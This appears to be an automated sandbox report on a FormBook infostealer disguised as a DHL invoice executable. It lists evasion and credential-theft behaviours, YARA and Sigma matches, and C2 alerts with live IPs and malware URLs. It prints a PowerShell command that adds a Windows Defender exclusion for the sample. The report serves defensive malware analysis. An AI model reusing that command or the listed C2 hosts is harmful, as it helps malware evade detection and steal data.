
Windows Analysis Report
dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe

Overview

General Information

Sample name: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe
Analysis ID: 1557059
MD5: 0df139fa0f5d3a83ecff651fdd692c68
SHA1: 2c6e2af9e1602bc83e5c5919c75ad4aa120c0d1b
SHA256: 165f9bea48c75c958594f2d88cbe59d007f506cc49c4500dfcee93dedb6f8cac
Tags: DHL, exe, user-abuse_ch

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Disables UAC (registry)
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses regedit.exe to modify the Windows registry
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe (PID: 6540 cmdline: "C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe" MD5: 0DF139FA0F5D3A83ECFF651FDD692C68)
    • powershell.exe (PID: 3452 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe" -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 5768 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • regedit.exe (PID: 1804 cmdline: "C:\Windows\regedit.exe" MD5: 999A30979F6195BF562068639FFC4426)
    • csc.exe (PID: 2688 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
      • rQkTBkrqhGpTBn.exe (PID: 5608 cmdline: "C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • wextract.exe (PID: 7496 cmdline: "C:\Windows\SysWOW64\wextract.exe" MD5: B9CC7E24DB7DE2E75678761B1D8BAC3E)
          • rQkTBkrqhGpTBn.exe (PID: 3604 cmdline: "C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7688 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
    • WerFault.exe (PID: 4308 cmdline: C:\Windows\system32\WerFault.exe -u -p 6540 -s 1348 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • cleanup
No configs have been found
Yara matches in memory dumps

Source | Rule | Description | Author | Strings
0000000D.00000002.4139355543.0000000000400000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000D.00000002.4139355543.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown | 0x2be10:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55; 0x13e9f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000000D.00000002.4140304298.0000000000D20000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000D.00000002.4140304298.0000000000D20000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown | 0x2be10:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55; 0x13e9f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000004.00000002.2074798692.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
(13 entries in total; only the first are shown)

Yara matches in unpacked PE files

Source | Rule | Description | Author | Strings
4.2.csc.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
4.2.csc.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown | 0x2e5a3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55; 0x16632:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
4.2.csc.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
4.2.csc.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown | 0x2f3a3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55; 0x17432:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

System Summary

Sigma rule matches

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe", ParentImage: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, ParentProcessId: 6540, ParentProcessName: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe" -Force, ProcessId: 3452, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe", ParentImage: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, ParentProcessId: 6540, ParentProcessName: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe" -Force, ProcessId: 3452, ProcessName: powershell.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe", ParentImage: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, ParentProcessId: 6540, ParentProcessName: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe" -Force, ProcessId: 3452, ProcessName: powershell.exe
Suricata IDS alerts (SID 2050745)

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-17T08:35:54.803469+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49742 | 3.33.130.190 | 80 | TCP
2024-11-17T08:36:18.451019+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49838 | 64.225.91.73 | 80 | TCP
2024-11-17T08:36:31.864264+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49915 | 209.74.64.187 | 80 | TCP
2024-11-17T08:36:53.370528+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50020 | 162.0.215.33 | 80 | TCP
2024-11-17T08:37:06.722391+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50024 | 3.33.130.190 | 80 | TCP
2024-11-17T08:37:20.466700+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50028 | 98.124.224.17 | 80 | TCP
2024-11-17T08:37:33.867748+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50032 | 67.223.117.169 | 80 | TCP
2024-11-17T08:37:48.046200+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50036 | 3.33.130.190 | 80 | TCP
2024-11-17T08:38:01.586729+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50040 | 3.33.130.190 | 80 | TCP
2024-11-17T08:38:14.915984+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50044 | 3.33.130.190 | 80 | TCP
2024-11-17T08:38:28.976984+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50048 | 172.217.18.19 | 80 | TCP
2024-11-17T08:38:42.698493+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50052 | 13.248.169.48 | 80 | TCP
2024-11-17T08:38:58.943682+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50056 | 3.33.130.190 | 80 | TCP

Suricata IDS alerts (SID 2855464)

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-17T08:36:10.681399+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49792 | 64.225.91.73 | 80 | TCP
2024-11-17T08:36:13.243548+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49807 | 64.225.91.73 | 80 | TCP
2024-11-17T08:36:15.795679+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49822 | 64.225.91.73 | 80 | TCP
2024-11-17T08:36:24.257088+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49869 | 209.74.64.187 | 80 | TCP
2024-11-17T08:36:26.754764+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49884 | 209.74.64.187 | 80 | TCP
2024-11-17T08:36:29.320780+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49900 | 209.74.64.187 | 80 | TCP
2024-11-17T08:36:45.687951+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49989 | 162.0.215.33 | 80 | TCP
2024-11-17T08:36:48.234082+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50001 | 162.0.215.33 | 80 | TCP
2024-11-17T08:36:50.826946+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50017 | 162.0.215.33 | 80 | TCP
2024-11-17T08:36:59.083627+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50021 | 3.33.130.190 | 80 | TCP
2024-11-17T08:37:01.830447+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50022 | 3.33.130.190 | 80 | TCP
2024-11-17T08:37:04.176598+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50023 | 3.33.130.190 | 80 | TCP
2024-11-17T08:37:12.618902+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50025 | 98.124.224.17 | 80 | TCP
2024-11-17T08:37:15.155421+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50026 | 98.124.224.17 | 80 | TCP
2024-11-17T08:37:17.703737+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50027 | 98.124.224.17 | 80 | TCP
2024-11-17T08:37:26.242161+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50029 | 67.223.117.169 | 80 | TCP
2024-11-17T08:37:28.797666+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50030 | 67.223.117.169 | 80 | TCP
2024-11-17T08:37:31.349528+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50031 | 67.223.117.169 | 80 | TCP
2024-11-17T08:37:39.569655+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50033 | 3.33.130.190 | 80 | TCP
2024-11-17T08:37:42.107536+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50034 | 3.33.130.190 | 80 | TCP
2024-11-17T08:37:44.661726+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50035 | 3.33.130.190 | 80 | TCP
2024-11-17T08:37:54.657728+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50037 | 3.33.130.190 | 80 | TCP
2024-11-17T08:37:56.327332+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50038 | 3.33.130.190 | 80 | TCP
2024-11-17T08:37:59.057631+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50039 | 3.33.130.190 | 80 | TCP
2024-11-17T08:38:08.139589+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50041 | 3.33.130.190 | 80 | TCP
2024-11-17T08:38:09.809608+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50042 | 3.33.130.190 | 80 | TCP
2024-11-17T08:38:12.368620+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50043 | 3.33.130.190 | 80 | TCP
2024-11-17T08:38:21.128979+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50045 | 172.217.18.19 | 80 | TCP
2024-11-17T08:38:23.500997+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50046 | 172.217.18.19 | 80 | TCP
2024-11-17T08:38:26.047633+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50047 | 172.217.18.19 | 80 | TCP
2024-11-17T08:38:34.901319+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50049 | 13.248.169.48 | 80 | TCP
2024-11-17T08:38:37.549598+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50050 | 13.248.169.48 | 80 | TCP
2024-11-17T08:38:40.010481+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50051 | 13.248.169.48 | 80 | TCP
2024-11-17T08:38:49.249571+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50053 | 3.33.130.190 | 80 | TCP
2024-11-17T08:38:50.909685+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50054 | 3.33.130.190 | 80 | TCP
2024-11-17T08:38:53.573643+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50055 | 3.33.130.190 | 80 | TCP
2024-11-17T08:39:05.537341+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50057 | 3.33.130.190 | 80 | TCP
2024-11-17T08:39:07.190058+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50058 | 3.33.130.190 | 80 | TCP
2024-11-17T08:39:10.044833+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50059 | 3.33.130.190 | 80 | TCP


AV Detection

Source: http://www.gcast.video/9kvp/?Y8i=irFuJh4j2fCN/xdLIJkju+0Ww/aOPRv0cSVSUNzcrQBJ8yd3G+0Gay8rhpLSBKnoinj5jjn5ajFjqPJaFJwFxtDWOxi5ujV2lXqfQRwRqrJQ238DxciUY6U=&gvyXe=EtxTw6OpYVppMB | Avira URL Cloud: Label: malware
Source: http://www.gcast.video/9kvp/ | Avira URL Cloud: Label: malware
Source: http://www.arcare.partners/veiq/?gvyXe=EtxTw6OpYVppMB&Y8i=ZaCIZuFl7wZEptGr8oGQP+xb0A/J37Yq6QCg9bOCsWn91ieeFGXGB3UxVSoIIHFs/R2ofeQV0TveU8WhT6zXata70k2wUe2St57OOyVKg7CHUyAKXe1z7Nw= | Avira URL Cloud: Label: malware
Source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe | ReversingLabs: Detection: 47%
Source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe | Virustotal: Detection: 45%
Source: Yara match | File source: 4.2.csc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000D.00000002.4139355543.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.4140304298.0000000000D20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2074798692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.4142164546.0000000005360000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.4140267279.0000000000CD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2075004528.0000000005600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.4140287170.0000000002670000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2075245562.0000000005A60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe | Joe Sandbox ML: detected

Exploits

Source: Yara match | File source: 00000000.00000002.1847215159.000002B40039F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe PID: 6540, type: MEMORYSTR
Source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1853707801.000002B47C8F6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: .pdbHJp source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1846210334.000000F06B1F3000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: wextract.pdb source: csc.exe, 00000004.00000002.2074916274.00000000052B8000.00000004.00000020.00020000.00000000.sdmp, rQkTBkrqhGpTBn.exe, 0000000C.00000002.4139831429.0000000000A08000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1853707801.000002B47C8F6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Windows.Forms.ni.pdb source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb.0M source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1853707801.000002B47C8F6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Drawing.ni.pdb source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: wntdll.pdb source: csc.exe, csc.exe, 00000004.00000003.1984836157.00000000053B5000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000004.00000003.1986270313.0000000005569000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, csc.exe, 00000004.00000002.2075036679.00000000058AE000.00000040.00001000.00020000.00000000.sdmp, wextract.exe, wextract.exe, 0000000D.00000003.2076822878.0000000004230000.00000004.00000020.00020000.00000000.sdmp, wextract.exe, 0000000D.00000003.2078180097.00000000043E1000.00000004.00000020.00020000.00000000.sdmp, wextract.exe, 0000000D.00000002.4140587066.0000000004590000.00000040.00001000.00020000.00000000.sdmp, wextract.exe, 0000000D.00000002.4140587066.000000000472E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.PDB405(z source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1846210334.000000F06B1F3000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: StrongNameFreeBufferStrongNameTokenFromPublicKeyStrongNameErrorInfo.PDBdiasymreader.dllDllGetClassObject%X%X%X%X%X%X%X%X%X%X%X.TMP0x%016I64xCSCalink.dll with IAlink3 source: wextract.exe, 0000000D.00000002.4141477691.0000000004C6C000.00000004.10000000.00040000.00000000.sdmp, wextract.exe, 0000000D.00000002.4140392586.0000000004237000.00000004.00000020.00020000.00000000.sdmp, rQkTBkrqhGpTBn.exe, 0000000E.00000000.2141501567.0000000002F2C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000F.00000002.2368705885.000000001EA9C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdb source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1853707801.000002B47C8DF000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Drawing.ni.pdbRSDS source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: mscorlib.pdbh source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1853707801.000002B47C840000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbk source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1853707801.000002B47C8F6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdbh source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1853707801.000002B47C8F6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: csc.pdbF source: wextract.exe, 0000000D.00000002.4141477691.0000000004C6C000.00000004.10000000.00040000.00000000.sdmp, wextract.exe, 0000000D.00000002.4140392586.0000000004237000.00000004.00000020.00020000.00000000.sdmp, rQkTBkrqhGpTBn.exe, 0000000E.00000000.2141501567.0000000002F2C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000F.00000002.2368705885.000000001EA9C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: System.Xml.ni.pdbRSDS# source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: pC:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.PDB source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1846210334.000000F06B1F3000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: System.Core.ni.pdb source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: Microsoft.VisualBasic.pdb source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1853707801.000002B47C8F6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: rQkTBkrqhGpTBn.exe, 0000000C.00000002.4139357076.00000000001EE000.00000002.00000001.01000000.00000009.sdmp, rQkTBkrqhGpTBn.exe, 0000000E.00000000.2140751546.00000000001EE000.00000002.00000001.01000000.00000009.sdmp
            Source: Binary string: mscorlib.ni.pdb source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1853707801.000002B47C8F6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\mscorlib.pdb source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1853707801.000002B47C8F6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: csc.pdb source: wextract.exe, 0000000D.00000002.4141477691.0000000004C6C000.00000004.10000000.00040000.00000000.sdmp, wextract.exe, 0000000D.00000002.4140392586.0000000004237000.00000004.00000020.00020000.00000000.sdmp, rQkTBkrqhGpTBn.exe, 0000000E.00000000.2141501567.0000000002F2C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000F.00000002.2368705885.000000001EA9C000.00000004.80000000.00040000.00000000.sdmp
